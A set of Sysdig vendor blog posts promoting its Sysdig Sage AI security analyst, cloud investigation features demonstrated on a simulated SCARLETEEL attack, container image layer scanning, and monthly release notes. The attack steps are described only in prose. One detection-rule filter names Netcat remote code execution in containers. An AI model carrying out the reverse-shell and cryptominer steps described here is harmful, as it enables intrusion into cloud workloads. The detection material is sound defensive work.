Sysdig Sage for CDR combines AI with security analysis as part of our ongoing mission to protect our customers in the cloud. Sysdig Sage observes your cloud data and generates responses that enable you to stop attackers. This revolutionary new AI assistant can also execute a variety of use cases, including contextual analysis of cloud and workload data, summarized event overview, and suggested remediations to contain an adversary.  

Here are just a few of the key new capabilities Sysdig Sage offers to enrich your CDR workflows:

• Statistics on security events: Streamline analysis and proactively address breach scenarios by identifying critical events that need immediate attention.
• Explanation of security events: Bridge skill gaps within security operations with detailed explanations of runtime events.
• Suggested next steps: Reduce response timelines and improve compliance with behavioral details of relevant events at a broader level.
• Contextual awareness: Contextualize the data a user observes to answer questions more precisely and move them across the platform to better visualize threats.

Let’s take a look at how Sysdig Sage can help you with a few key use cases.

Use case 1: Elevate skill gaps across operations

With Sysdig Sage, cybersecurity becomes easier for everyone. It refines your investigation journey as your team trawls through volumes of mundane tasks and events on a daily basis. It also helps foster collaborative workflows and motivates the team to stay vigilant for threats.

To demonstrate this, let’s narrow our scope and search for High severity logs from a specific cluster. Use the Search bar to type the below query.

kubernetes.cluster.name=risks-aws-eks-workloads-shield

Sysdig Secure applies this query across volumes of cloud data and filters the events relevant to the chosen timeline and cluster name. At a glance, we have over 300 exclusive events. Even for mature security operations, this volume of events could be overwhelming. Somewhere, somehow, it’s likely that a critical blindspot will be missed. These missed details will negatively impact response strategies and may leave an opening for an adversary to walk right in through the front door.

Sysdig Sage alleviates some major operational pain points by enabling users to ask questions in a natural language format, swiftly derive a quick summary of the situation, and deploy prescriptive response strategies to throw a wrench in the adversary’s plans.

For example, let’s launch Sysdig Sage and ask it to summarize our filtered results.

Summarize events for this cluster

Sysdig Sage for CDR categorized the events under two distinct headers, namely Drift Detection and Malicious Binary Detected. Without any previous context of what the issue is, we now understand that the threat actor has managed to launch a malicious binary on several Kubernetes workloads, and we know that the Drift Detection policy (curated and maintained by our Sysdig Threat Research Team) prevented the listed workloads from being compromised. 

This information is enough to alert our security teams so they can deploy their established response strategies and mitigate the risk of a breach scenario. 

With Sysdig Sage, every user becomes a security investigator. 

Use case 2: Leverage AI to power your investigation

Sysdig Sage for CDR can respond to multiple queries in a row by correlating context from previous responses. This helps your teams uncover additional details relevant to an attack.

During a breach, you have very little time to do the necessary due diligence. We need to collect enough context at speed so the responsible teams can jump in and prevent the adversary from causing further damage. 

As an example, let’s use Sysdig Sage for CDR to perform a detailed analysis of all the events and generate an investigation report.

Generate detailed investigation report

From this report, we notice there’s an active miner (easyminer) running within the risk-10-aws-bedrock-java namespace. A quick online search reveals that the detected binary is a legitimate open source mining software. However, the presence of it within our environment is suspicious. 

The report indicates that the adversary, after compromising the workload, downloaded and launched a cryptominer to serve its objectives.

Let’s ask Sysdig Sage to help us understand the root cause of the detected event.

what was the root cause for the malicious binary detected on risk-10-aws-bedrock-java?

Sysdig Sage for CDR understood our query in natural language and identified that the root cause responsible for triggering the detection event was a shell script malicious-bin-e ./malicious-bin-event-gen.sh 

Within seconds, we have enough useful context about the detected malicious binary. Sysdig Sage for CDR has helped us answer the “what” and “why” of the event and saved valuable investigation time. However, our investigation is far from complete. 

Our next goal should be to understand the adversary methods used to breach the perimeters and access our workloads. Let’s ask Sysdig Sage to enlist the tactics and techniques used by the threat actor according to the MITRE ATT&CK framework.

what MITRE ATT&CK tactics & techniques were used?

The results show that the threat actor used MITRE ATT&CK tactics to execute the malicious binary, maintain persistence, and evade defenses within the cluster. 

At this stage, if you are curious about what’s going on under the hood, you can always use the accessibility options (top right) to pop into the Events Feed. Here,  you’ll notice filters are automatically applied, and there’s a timeline of every malicious binary event detected within our defined cluster risk-10-aws-bedrock-java.

Now, to gain further context on each MITRE ATT&CK tactic, let’s ask Sysdig Sage to list the attack path.

list the attack path

Within seconds, Sysdig Sage for CDR expands the process tree to align each detected event under a specific MITRE ATT&CK category. This helps discover all the possible entry points and the security gaps that were potentially exploited by the threat actor. 

But now the real question is, how severe is this event? Let’s ask Sysdig Sage to provide us with a blast radius, listing all the workloads that may have been impacted by the threat actor.

how many workloads were impacted?

The results indicate that quite a lot of workloads were possibly impacted by the threat actor. After this, you should really be looking for the panic button and calling in the cavalry, aka your SecOps and DevSecOps teams.

Use case 3: Achieve the 555 Benchmark for Cloud Detection and Response 

We demonstrated in the previous use cases how you could use Sysdig Sage for CDR as your security assistant and gather the preliminary information crucial for any security investigation. However, if you are the only one holding the fort for your organization, you need to apply temporary fixes before alerting the specialists. 

Let’s ask Sysdig Sage for suggested steps that may help you to preempt any adverse events, like user credential compromise, SSH key exfiltration, process masquerading, and many more.

how do I fix this?

Sysdig Sage for CDR recommends a few best practices to mitigate potential risks and prevent further compromise of your environment. Here, isolating the affected resource seems like a good way to stop the adversary in their tracks. 

But in case we didn’t know what to do in such a situation, let’s ask Sysdig Sage to provide us with detailed guidance.

give me detailed guidance on isolating affected resources

Stay ahead of threats with Sysdig Sage

Sysdig Sage for CDR is the handy security assistant that first, helps you stay calm during an incident, and second, guides you along each step to uncover all the necessary details required for a thorough investigation. It makes a security incident feel like a simple DIY project.

Sysdig Sage empowers security teams to capitalize on the real-time nature of the Sysdig platform and the cutting-edge discoveries of the Sysdig Threat Research team. With Sysdig Sage at your side, you can accelerate your response to threats without leaving the platform.

Join our upcoming seminar: AI-Powered CDR in Action for a technical demonstration of how you can leverage Sysdig Sage to detect, investigate, and respond to attacks in minutes.

The post Supercharge your investigation with Sysdig Sage™ for CDR appeared first on Sysdig.

With only 5 minutes to perform cloud investigations and block attacks before they are executed, Sysdig Sage for CDR accelerates analysis and investigation, allowing users to prioritize what matters. With Sysdig Sage, users can focus on attack responses rather than spending time connecting the dots or retrieving key information to understand the attack’s big picture and impact.

What is Sysdig Sage for CDR?

Sysdig Sage is a generative AI cloud security analyst – an expert that empowers users, letting them ask questions about their runtime events in natural language within Sysdig Secure’s Events Feed.

The Events page provides an overview of security events occurring across your infrastructure, allowing you to dive deep into specific details, distinguish false positives, and configure policies – based on open source Falco – to enhance security.

Sysdig Sage elevates these capabilities infusing AI into security analysis operations, delivering:

• Statistics of security events: Review top statistics for runtime security events based on various groupings such as policy name, rule (event type), severity, and more. This will help users streamline the analysis and quickly identify and focus on events that are relevant to the investigation
• Explanation of security events: Sysdig Sage can provide details about runtime events to users and dig deeper into them – for example, to explain the command lines that generated them. 
• Suggested next steps: Sysdig Sage for CDR can get behavioral details from sample runtime events to summarize what happened at a broader level and suggest some next steps to fix and remediate the issues. This will help users move faster and immediately take action.
• Context awareness: Sysdig Sage for CDR provides a fully integrated experience. It understands what users are navigating in the Secure UI and can control it, allowing users to quickly jump to the events and information relevant to their investigation.

See Sysdig Sage in action

As someone working in security operations, you might want to easily navigate, filter, and focus on relevant events. When viewing the Sysdig Events feed, you want to be able to understand the events you need to focus on.

You might filter out low and medium-severity events but still have tons of events to process. This is when Sysdig Sage can speed up your work. You are one click away from asking “Can you summarize these events?” Sysdig Sage will understand that you activated these filters in the UI and only focus on high-severity events that occurred in the last 6 hours:

You can then click on “Link to events” to quickly reach the events you want to analyze in the UI and keep the conversation going with a focus on the event you want to look at more closely:

At this point, you might want to better understand why the user was allowed to perform that action and if it represents a threat:

Now that you connected the dots, you will be able to start crafting your remediation strategy:

And finally: the big picture. Is the threat you analyzed part of a broader security incident? Let’s ask Sysdig Sage!

In just a few questions, you were able to refine your analysis, get all the needed information without leaving Sysdig Secure, and get guidance on what steps to take.

Unlock the power of AI for cloud security

Cloud attacks happen fast. Sysdig Sage for CDR is the ultimate secret weapon to equip security teams to achieve the 555 Benchmark for Cloud Detection and Response, quickly make informed decisions, rapidly respond to threats, and save time on the most complex tasks.

With Sysdig Sage you can:

• Supercharge skills: Whether a novice or expert, Sysdig Sage for CDR will help you understand your runtime events.
• Save time: Focus on outcomes, not the analysis. 
• Get actionable insights: Know where to start and reduce time to respond – from hours to seconds.
• Collaborate better: Level set knowledge across teams. 

By reducing analysis time to just seconds and seamlessly connecting the dots, Sysdig Sage for CDR impacts daily security operations, supercharging CNAPP capabilities with the power of AI.

Come talk to us about Sysdig Sage at our Black Hat booth.

Webinar: Outpacing cloud attackers with GenAI

Join Sysdig CTO, Loris Degioanni, to learn more about advanced AI strategies for rapid threat detection and response.

REGISTER NOW

The post Sysdig Sage™ for CDR: Accelerate analysis, investigation and response appeared first on Sysdig.

To streamline investigation and help teams understand how to respond to fast-moving cloud attacks, AI for cloud security needs specialized, domain-specific programming, contextual awareness, and the ability for teams to have multi-step conversations that transform data into actionable insights.

Navigating cloud complexity

Cloud ecosystems and technology stacks can be incredibly complex. Navigating the intricacies of public and private clouds, containers, and Kubernetes requires domain expertise. Even seasoned professionals can find it challenging to stay ahead of the latest tech as it relates to cloud threats. For this reason, there is a tangible benefit to having an AI analyst that can instantly deliver the collective wisdom of human experts and the continuous learnings of AI models. 

Responding under pressure

Cloud security teams are under tremendous pressure as they race against the clock. When it’s crunch time, insufficient answers from an AI chatbot, or delays as you search for information aren’t just stressful; they can give adversaries the upper hand. During an investigation or incident response, a lot of time can be wasted trying to determine what something is and how to respond. The proper response for a given scenario may be less obvious to less experienced team members. Getting fast, accurate assistance can make a difference between data and workloads being impacted – or not.

Accelerating human response with a purpose-built AI cloud security analyst

When you have only minutes to respond, the ability to have a conversation that helps you quickly understand a cybersecurity event and how to address it is extremely powerful. To provide this level of support requires capabilities beyond just collecting and compiling data from external sources. By employing multi-step reasoning, contextual awareness, and specialized domain-specific programming, AI for cloud security can offer a truly autonomous and comprehensive approach to security analysis.

This is the approach we’ve taken with Sysdig Sage, Sysdig’s AI cloud security analyst. Sysdig Sage interacts with users through human-like conversations, helping to peel back the layers of security events. 

Architecturally, Sysdig Sage uses an autonomous agents approach, leveraging multiple specialized AI agents that work collaboratively with a common goal: to simplify and accelerate security and enable a faster, better-informed human response. This unique architecture uses advanced agent-based reasoning to not only collect data, but also to provide meaningful, context-aware recommendations that are directly useful for security decisions.

Key capabilities of Sysdig Sage

Multi-step reasoning: Sysdig Sage helps security teams peel back the layers of sophisticated cloud threats through in-depth conversations. Start with a simple question and ask follow-up questions to dive deeper, gaining a clearer understanding of runtime events. Straightforward answers and suggested queries enable quick comprehension of security implications and risks in complex cloud estates.

Contextual awareness: Sysdig Sage understands the context of what users are currently observing in the Sysdig UI and provides precise answers based on that context. It helps you navigate the platform UI, directing you to visualizations that provide a deeper understanding of a given event. As a result, team members of all skill levels get the help they need to manage more and escalate less.

Guided response: Beyond summarizing and explaining threats, Sysdig Sage suggests proactive response actions, prevention strategies, and process improvements. It empowers you to take full advantage of the real-time nature of the Sysdig platform, along with insights available from the Sysdig Threat Research team. Considering the speed at which attacks progress in the cloud, fast answers on how to stop threats are key.

Using Sysdig Sage, cloud security teams are equipped to handle complex security tasks:

• Incident investigation: Analyze incidents to determine root cause, including performed activities, cloud context, and responsible identities.
• Prioritization: Prioritize threats based on multiple factors, including severity and potential impact.
• Risk mitigation: Get effective strategies for mitigating identified risks and enhancing security posture and practices.

And, since Sysdig Sage is multilingual – with support for over 80 languages – you can take advantage of its insights in the language of your choice.

Comparing Sysdig Sage with traditional AI assistants

Sysdig Sage is a true AI security analyst. Looking at the landscape of AI assistance currently available, here’s how Sysdig Sage stacks up:

Insight generation vs. data aggregation

• Traditional AI assistants: Focus on collecting and compiling data from various sources.
• Sysdig Sage: Goes beyond aggregation to generate actionable insights through advanced agent-based reasoning.

Contextual awareness

• Traditional AI assistants: Use a separate prompt interface with little or no UI interaction.
• Sysdig Sage: Aware of the data the user is observing as context for queries; links users to directly relevant UI views.

Decision support vs. information presentation

• Traditional AI assistants: Present summarized information for review.
• Sysdig Sage: Provides detailed, step-by-step reasoning to support critical security decisions.

Adaptive problem-solving

• Traditional AI assistants: Focus on specific use cases (i.e. remediation information).
• Sysdig Sage: Tackles unforeseen challenges by combining autonomous agents’ specialized skills. Adaptability ensures AI remains effective in the face of evolving security threats.

Enhanced collaboration

• Traditional AI assistants: Support single tasks.
• Sysdig Sage: Acts as a true AI security analyst, supporting users in a free-flowing, contextual manner. Facilitates collaboration between human analysts and AI assistance.

Conclusion

As cloud security threats rapidly evolve, so too must capabilities for cloud security. AI capabilities built with multi-step reasoning and contextual awareness give defenders a new way to understand events, reduce escalations, and streamline response. If you’re new to cloud security, having an AI companion to offer insights and advice can help quickly build your skills and aid you in making the right call in the face of threats. And, if you’re a security veteran, finding ways to save time is likely at the top of your list – AI can help. 

Sysdig has designed its cloud security analyst, Sysdig Sage, to function like a team of experts by your side – always available to help you stay ahead of adversaries in an increasingly complex cloud landscape. We invite you to read the next blog in our launch series to learn more and see Sysdig Sage in action.

Webinar: Outpacing Cloud Attackers with GenAI

Join Sysdig CTO, Loris Degioanni, to learn more about advanced AI strategies for rapid threat detection and response.

REGISTER NOW

The post Sysdig Sage™: A groundbreaking AI security analyst appeared first on Sysdig.

What’s new: Layered Analysis capabilities

Layered Analysis enhances our container security toolkit by offering a granular view of container images, breaking them down into their composing layers. This capability enables more accurate identification of vulnerabilities and optimized remediation workflows by clearly discerning whether vulnerabilities belong to the base image or the application layers, aiding in proper team assignment and resolution.

Key benefits

• Enhanced accuracy and reduced time to fix: Identify vulnerabilities at each container image layer, pinpointing the specific package and instruction responsible, thereby reducing fix time.

• Facilitate attribution and ownership: Discern whether vulnerabilities belong to the base image or the application layers, aiding in proper team assignment and resolution.

• Actionable insights: Receive practical, contextual recommendations to expedite and prioritize vulnerability resolution.

Detailed insights with Layered Analysis

Container images are constructed in layers, with each change or instruction during the build process creating a new layer. Layered Analysis helps detect and display vulnerabilities and packages associated with each image layer, identifying different remediation actions and ownership depending on the layer introducing the vulnerabilities.

For example, vulnerabilities in the base OS layer, such as an end-of-life (EOL) Alpine version, can be remediated by updating the base image version, a task typically performed by the security team. In contrast, vulnerabilities in the application or non-OS layers, such as outdated Go libraries like Gin or Echo, can be addressed by updating the versions of libraries and dependencies, tasks that fall to the development teams.

How to enable and use Layered Analysis

Layered Analysis is now generally available and requires the following components for full functionality:

• Cluster and Registry Scanners: Automatically supported with platform scanning.
• CLI Version 1.12.0 or Higher: Ensure you are using the latest CLI version.
• CLI Enhancements: Utilize new flags (–separate-by-layer and –separate-by-image) to modify output and view image hierarchy or layer information.
• JSON Outputs: Updated to include new fields for detailed layer information.

Exploring the image hierarchy

Understanding the image hierarchy is key to Layered Analysis, as shown in the screenshot below.

This view shows the difference between base images and application layers, helping you quickly identify where vulnerabilities come from:

• All layers: Shows the total number of vulnerabilities in the final image, including both application and OS layers. If a vulnerability is fixed in an intermediate layer, it won’t be included in the total count.

• Base Images (prefixed with FROM): Display vulnerabilities present in the base image, including those inherited from parent images.

• Application layers: Only show vulnerabilities introduced in the application layers, excluding those from base images.

Actionable recommendations

Layered Analysis doesn’t just identify vulnerabilities; it also provides recommendations to fix them. You’ll receive suggestions to upgrade base images, address the worst vulnerabilities in application layers, and fix problematic packages. 

These actionable insights help streamline the remediation process, ensuring that vulnerabilities are addressed efficiently and effectively.

Full visibility of image history

Layered Analysis also offers full visibility into the history of your container image. You can see packages that existed in previous layers but were removed in subsequent layers. 

While these packages no longer pose a security issue, having this historical view is invaluable for understanding the evolution of your image and ensuring comprehensive security management. 

This helps teams trace back through changes, making it easier to collaborate and maintain a secure container environment.

Investigate single layers

Another powerful feature of Layered Analysis is the ability to investigate single layers of your container image. You can see exactly what packages exist in each layer and identify any vulnerabilities introduced at that specific stage. 

This granular investigation capability allows teams to pinpoint the source of security issues and understand the impact of each layer’s changes. By isolating and analyzing single layers, you can more effectively manage and remediate vulnerabilities.

Leveraging Layered Analysis for better security

Layered Analysis empowers security and development teams by providing a clear and actionable view of container image vulnerabilities. By enhancing the precision of vulnerability identification and optimizing remediation workflows, teams can effectively reduce risks and improve overall security.

With Layered Analysis, teams can pinpoint exactly where a vulnerability was introduced, identifying the specific layer responsible. This capability is particularly useful in large organizations where multiple teams are involved in containerized applications lifecycle, from building images to deploying and monitoring their health — such as infrastructure engineers creating/curating base images, developers packaging applications, and all of them working together to make sure workloads are as secure and vulnerability free as possible and security patches are promptly applied. By tracing vulnerabilities back to their source, teams can determine responsibility and ensure accountability.

By clearly distinguishing between base image and application layer vulnerabilities, Layered Analysis enables more efficient routing of remediation tasks. Security teams can focus on updating base images to mitigate inherited vulnerabilities, while development teams handle issues within the application layers. This structured approach not only streamlines the remediation process but also enhances the overall security posture of containerized environments.

Want to learn more? Reach out to your Sysdig representative, or book a demo here!

The post Introducing Layered Analysis for enhanced container security appeared first on Sysdig.

But organizations and security teams aren’t alone. Threat actors have been readily adapting their craft to take advantage of cloud speed. As a result, cloud attacks happen fast, rapidly weaving through a target’s cloud estate and drawing on extensive capabilities to achieve their goals. 

A prime example is the SCARLETEEL attack, which can infiltrate an organization, execute cryptominers, uncover cloud credentials, pivot to other cloud accounts, and ultimately exfiltrate proprietary data – all in just 220 seconds. Investigating cloud attacks like SCARLETEEL has traditionally been a laborious, error-prone, and manual process. The odds are stacked against defenders, and the reality is that security teams are often unable to investigate threats before the attack completes. 

That’s why the 5/5/5 Benchmark for Cloud Detection and Response – the only industry standard for cloud security – establishes that you have just five minutes to perform cloud investigations to head off attacks before they can be executed.

What’s new: Enhanced investigations capabilities

Today, Sysdig is streamlining cloud detection and response (CDR) use cases by automating the collection and correlation of events, posture, and vulnerabilities to identities. The cloud context these capabilities provide is unparalleled. An interactive visualization of this information helps analysts instantly conceptualize attacks, unlocking five-minute investigations across the most advanced threats. 

The key new capabilities enhancing investigations include:

• Attack chain visualization
• Real-time identity correlation 
• Investigation workflow optimization

Attack chain visualization 

Security teams can leverage any alert or suspicious finding as a starting point to launch an investigation with the Sysdig Cloud Attack Graph. The graph provides attack chain visualization and empowers security analysts to rapidly understand the relationships between resources, and their implications for the attack chain across any cloud environment.

Sysdig’s attack chain visualization accelerates investigations by automatically correlating cloud and workload events to identities. Deep context from command history, as well as network and file activity, is easily gleaned from the overlays. Sysdig’s automated captures enable analysts to dig deeper by automatically tying digital forensic evidence to the events. Real-time context is combined with vulnerabilities and misconfiguration findings to provide a comprehensive and holistic view of a threat. To further simplify workflows, and narrow an investigation window when necessary, all investigations are MITRE-mapped and filterable. 

Real-time identity correlation 

At their core, all cloud attacks revolve around identities. Whether it be human or machine, one or many, analysts need a way to stitch suspicious findings to identities and their associated behaviors. Sysdig’s enhanced investigation capabilities automatically correlate cloud events with enriched identity data. Using attack chain visualization, analysts can rapidly understand suspicious identity behaviors such as unusual logins, impossible travel scenarios, and malicious IP addresses. With this context, teams can rapidly understand the who, what, where, and how of threat actors in their infrastructure.

This visibility also helps teams to rapidly rightsize excessive permissions, such as by configuring them to permissions from before they were compromised by a malicious adversary. 

Investigation workflow optimization 

A single purpose-built platform can break silos and streamline downstream activities. Security becomes a critical and valuable business partner by delivering relevant, high-context guidance across key stakeholders. Rapid investigation findings enable prescriptive guidance for response actions across incident response, platform, developer, and DevSec teams. These accelerated findings allow response teams to initiate a response within five minutes, adhering to the five minute response standard outlined in the 5/5/5 Benchmark. 

Closing the loop, the enhanced incident debrief findings these investigations provide (such as what misconfigurations, permissions, and vulnerabilities were abused to perpetuate the attack) can then be shared to tune and harden preventive controls. This focus on perpetual improvement to preventative controls helps ensure incidents are non-recurring, reducing organizational cloud risk.  

Outpace cloud attacks with Sysdig’s enhanced investigations

The acceleration of cloud detection and response is critical to combat modern attacks. The automation-fueled pace of cloud attacks means that investigations must move even faster. Sydig’s enhanced investigations unlock security teams by increasing efficiency, reducing skill gaps, and empowering security and platform teams to make better-informed decisions, faster. 

Join our upcoming webinar, Cloud Investigations in Just 5 Minutes, for a discussion with security experts on the evolution of cloud detection and response and its impacts. 

The post Introducing New Investigation Features for Sysdig Secure appeared first on Sysdig.

With all this in mind, it’s no surprise that according to Forrester research, “cloud detection and response is the next and most important frontier for security operations teams.”¹ To answer this need, Sysdig’s real-time cloud investigation gives organizations back precious time, reduces skill gaps, and grants security and platform teams the ability to make faster, better-informed decisions. 

Sysdig’s new investigation capabilities enable customers to optimize their cloud detection and response (CDR) use cases with automated collection and correlation of all their cloud data, including events, posture misconfigurations, and exploitable vulnerabilities to identities. 

The improved user interface allows security teams to interact with and instantly decipher the most complex attack chains, unlocking your ability to investigate threats in under 5 minutes, as outlined in the 555 Benchmark. 

The key new capabilities enriching your investigations include:

• Attack chain visualization – Leverage any alert or suspicious findings as the root cause to launch an investigation with the Sysdig Cloud Attack Graph. 
• Real-time identity correlation – Enhanced investigation capabilities automatically correlate cloud events with identity data.
• Investigation workflow optimization – A single purpose-built platform breaks silos and streamlines downstream activities for security personas with diverse skill sets.

See our new investigation features in action

Sysdig’s new investigation flow automatically stitches together context from across the Sysdig platform. It rapidly identifies the root cause of events and contextualizes data to speed up investigations in the cloud.

To demonstrate the power of Sysdig’s new investigation capabilities, we simulated a SCARLETEEL attack that exploits a vulnerable application in a containerized workload. This includes steps to establish a reverse shell, download a cryptominer, elevate privileges to disable S3 bucket policies, and steal customer data.

We begin our investigation with the Events Overview dashboard. Security teams may monitor a similar-looking dashboard across your multi-cloud environment. 

If we set the time frame to six hours using the time picker below, we notice a sudden spike in the volume of high-severity events (see Events By Severity widget) within this short time frame. This is unusual; on most days you do not see this many events, and since you must assume any unusual activity could indicate a breach, this aberration is suspicious and warrants a prompt response. Our goal is to triage and collect as much information as possible to create a deep contextual narrative.

First, let’s dive in and look at the events to uncover answers that explain this unusual spike seen on our dashboard. Filter for high-severity events to quickly intercept any ongoing attacks launched by the threat actors. 

We are redirected to the Events feed, where all cloud events are logged and enriched with details, including the triggered Sysdig rules/policies, timestamps, account IDs, cluster names, user names, and the IP address. 

This enables us to visualize the timeline of events leading up to a cloud attack. It also eliminates the skill gap, allowing analysts to easily ascertain the severity of an attack, the impacted cloud workloads, and the compromised user accounts. The search bar at the top and the filters on the left narrow your scope of events to investigate, thereby improving your internal metrics, such as SLAs (service-level agreements), MTTI (mean time to investigate), and MTTR (mean time to respond). 

Sysdig’s Threat Research Team also curates and maintains an exhaustive library of rules you can use, such as the following example:

ruleName = Netcat Remote Code Execution in Container

To filter relevant events within the defined time frame (six hours in our demo), we would simply type the above string in the Search bar. Alternatively, you could also use the left panel to derive similar results. This helps reduce noise, and scopes out relevant events that could explain the unusual spike detected earlier. 

In this scenario, we filter events where Sysdig has detected a Netcat execution on your cloud workload. Netcat is a common tool used by adversaries to assist in illegal activities, and is flagged and quarantined by many antivirus applications. Let’s dive in and review the factors that triggered the above Sysdig rule, including the captured command line, process tree, user and cloud details, vulnerabilities, and the rule tags.

Sysdig provides you enough context to collaborate with diverse personas, such as vulnerability management, developers, security architects, infrastructure, and more, so you can engage with and address any security gaps with clinical precision.

By now, your curiosity has likely been piqued enough to want to uncover the relationships between the impacted resources and the contributing events. 

Our attack chain visualization provides a single graphical overview of the adversary’s tactics, techniques, and procedures. It consolidates data from multiple sources — including posture misconfigurations, existing vulnerabilities, launched processes, and activity audits — to evaluate the impact of the ongoing threat.

Sysdig correlates events and enriches them with deep runtime insights, enabling analysts to rapidly investigate and pivot across any resource, event, or attribute. Our platform helps trace adversary movements across your cloud environment, and potentially prevent them from further compromising your network.

At a glance, you will gain critical understanding of an event’s context, such as: 

• What was the root cause of the event?
• What other systems has the threat actor accessed that may be at risk?
• What processes and commands were run on the impacted workloads?
• What vulnerabilities or misconfigured permissions are in use?
• What permissions and identities were elevated?

The runtime detections (seen to the left) depict a timeline of activities within the specified cluster. They are color-coded to indicate severities.

The graph also enables you to directly interact with the impacted assets. For example, in our demo, the workload legacy-webapp is the impacted resource. If we were to click on it, a list of interactive options enable you to navigate and review the specific factors that led to this high-severity event.

A drawer opens up to the right that provides under-the-hood configuration details of the workload, including the image, cluster name, namespace, and zones. It also collects data across the posture misconfigurations, in-use exploits, activity audit, and launched processes. For example, if you were to navigate to the Posture tab, you’ll observe all the posture findings on the workload (agentless approach), and the reasons why certain controls failed on the impacted workload. 

This level of context and guided remediation helps eliminate friction points, and enables your security teams to make split-second decisions at crunch time.

Now that we are comfortable handling the UI, let’s pivot to Processes, where all the executed commands on the workload are logged at runtime. This helps you to understand whether this was a lone event or part of a bigger threat activity.

From this view, you can see that the user (assuming root privileges) downloaded a few java files on the workload. You have intel by now from the Vulnerabilities tab that your legacy-webapp has a Spring4Shell Java vulnerability (read here for more context). 

Jump in to review the Process Tree for the curl command and trace the adversary movement within your cloud estate.

The process tree traces out the timeline of executed command lines captured by the agent at runtime. It illustrates the kill chain from user to process, including process lineage, container and host information, malicious user details, and impact. Almost immediately, you’ll see an xmrig, which is a cryptominer, weaponized as a trojan that masquerades as a legitimate program but conceals malicious or unwanted functionality. This xmrig was executed a few seconds after the Java files were downloaded on the workload. This is evidence enough that the workload is infected, and you need to respond promptly to contain the attack. 

Now that you have an idea of the what and the why, let’s dig deeper to uncover the who behind these events. The Identity view expands your investigation to discover whether our adversary compromised any legitimate user accounts to execute their objectives.

Here, the user interface displays the impacted user accounts, correlated at runtime with the high-severity events observed at the start of our investigation. The adjacent world map illustrates the captured regions where these accounts may have launched the SCARLETEEL attack. Since time is of essence here, let’s narrow our investigation window to an hour to confirm the threat actor lurking in your network.

Almost immediately, Sysdig filters an EC2 role and a user account Admin6 within this time window.  It also brings forth relevant events associated with the identities on the left. 

The events shown indicate multiple reconnaissance activities within your cloud environment. Unless there’s a scheduled maintenance activity, you usually shouldn’t see these discovery events across your cloud accounts.

After further investigation, the data reveals that the adversary assumed the EC2 role to create access keys for a user account, Admin6, within your environment.

Admin6 does not conform to normal naming standards, and the data indicates that this particular account has elevated privileges and several unused permissions. 

Our hypothesis is now confirmed, and we know for certain that this user account has been taken over by the adversary. You can now take quick corrective steps and optimize your IAM policies to prevent further adversary movement. 

Expand the time window to review all the interactive commands, established connections, file activities, and executable requests related to Admin6.

Sysdig’s deep runtime insights, coupled with automatic cross-cloud context and correlation, enable security and development teams to understand the who, what, where, when, and why of the cloud investigation in just 5 minutes. 

This feature is purpose-built to alleviate your investigation pain points, and sets you up to achieve the 555 Benchmark faster than with any traditional detection and response tools.

Join our upcoming deminar 5-Minute Cloud Security Investigations in Action, a technical demonstration of how Sysdig accelerates cloud-native investigation.

1. Forrester – The Comprehensive Guide To Cloud Detection and Response; Allie Mellen, Andras Cser, Jeff Pollard; April 23rd, 2024. ↩︎

The post How to Cut Cloud Investigations to 5 Minutes with Sysdig appeared first on Sysdig.

The Sysdig Threat Research Team (TRT) has been busy recently investigating and analyzing new security threats. Their research has uncovered notable vulnerabilities and attack vectors, which they’ve shared insights about through the Sysdig blog. These blog posts include an in-depth look at RUBYCARP, a long-running botnet, and LLMjacking, a technique that can leverage large language models for malicious purposes.

This month, we also announced our latest initiative, the Runtime Insights Partner Ecosystem. If interested, you can check out our blog post and the official press release.

Sysdig Secure

RBAC Permissions Available in Vulnerability Management

Administrators can now create RBAC roles and define which roles can access the Vulnerability Management, Policy, Reporting, and Risk Acceptance functions. For more information, see Custom Roles.

• Release notes

New Version Releases

Stay up-to-date with the latest releases for our scanning tools. May’s updates bring improved functionality, bug fixes, and security enhancements. 

Sysdig CLI Scanner V1.10.0

• Release notes

Runtime Scanner V1.7.0

• Release notes

Host Scanner V0.10.0

• Release notes

Upgrading is easy, but feel free to reach out if you have any questions.

Sysdig Monitor

Alert Editor

When creating alerts, the Alert Editor automatically displays the optimal time window for your alert rule, and every data point in the alert preview now corresponds with an evaluation of an alert rule. You can also Explore Historical Data for Metric alerts 

• Release notes

Sysdig Agents

13.20.0: Enhanced coverage and visibility

Our latest agent update adds support for Suse Linux and increased visibility into JMX and non-interactive commands.  

• Release notes

Suse Linux Enterprise Server Support

You can now install the Sysdig Agent on SLES 12 and SLES 15.

•  Release notes

Capture Non-Interactive Commands in Activity Audit

Activity audit can now capture and report non-interactive commands.

• Release notes

Support for Adding Labels to JMX Metrics

Sysdig added support for labels on JMX metrics collected by the agent. For more information, see Collect JMX Labels.

• Release notes

Defect Fixes

We have several fixes for our agent that landed in May. The complete list can be seen in the release notes.

SDK, CLI, and Tools

Terraform Provider V1.26.0

• Adds the ability to create, update, and delete posture policies.

For more information, see our Terraform Provider docs.

Sysdig Cloud Connector V0.16.66

• Makes secure_api_token optional in cluster-shield

Admission Controller v3.9.45

This release is available under helm chart 0.16.2.

• Makes secure_api_token optional in cluster-shield

Sysdig Secure Jenkins Plugin v2.3.1 

• Bump embedded scanner to 1.9.2
• Bug fixes:
  • Ensure that all the logs from the embedded scanner have been written to file for proper retrieval by the trailer
  • Increase the waiting time before stopping the logs trailer to 2s
  • Ensure proper management of vuln-list inside result json
  • Use imageTag (if available) when all policy evaluations pass

Prometheus Integration v1.29.0

• APPLY changes over PromQl labels on cluster status dashboards
• ADD restarted pods toplist panel to cluster status dashboard
• New version mysql-exporter fixing HIGH vulnerabilities
• New version php-fpm_exporter fixing HIGH vulnerabilities

Open Source

Falco

Falco 0.37.1 is the latest stable release.

New Website Resources

Blogs 

• Leadership Strategies for Risk Reduction, Transparency, and Speed
• Optimizing Wireshark in Kubernetes
• The Urgency of Securing AI Workloads for CISOs
• Cloud Security and Compliance: A Smarter Approach to Keeping Your Head Above Water
• The Race for Artificial Intelligence Governance
• Accelerating AppSec with Mend.io and Sysdig
• LLMjacking: Stolen Cloud Credentials Used in New AI Attack
• Sysdig Launches Runtime Insights Partner Ecosystem to Combat Active Cloud Risk and Stop Attacks
• Strengthening Cloud Security Together: Meet the Runtime Insights Partner Ecosystem
• Sysdig Launches AI Workload Security to Mitigate Active AI Risk
• How Businesses Can Comply with the EU’s Artificial Intelligence Act

Webinars

• May 28: Webinar | Navigating “Shift-left” in Container Security
• May 29: How to Safeguard GenAI Workloads in Exposed Environments
• June 18: Secure Your AWS Workloads From Code to Cloud
• June 19: Active Cloud Risk. How to Combat the Most Critical Threats
• June 25: Fast-Track True Cloud-Native Investigation: Winning the Race Against Cybercriminals

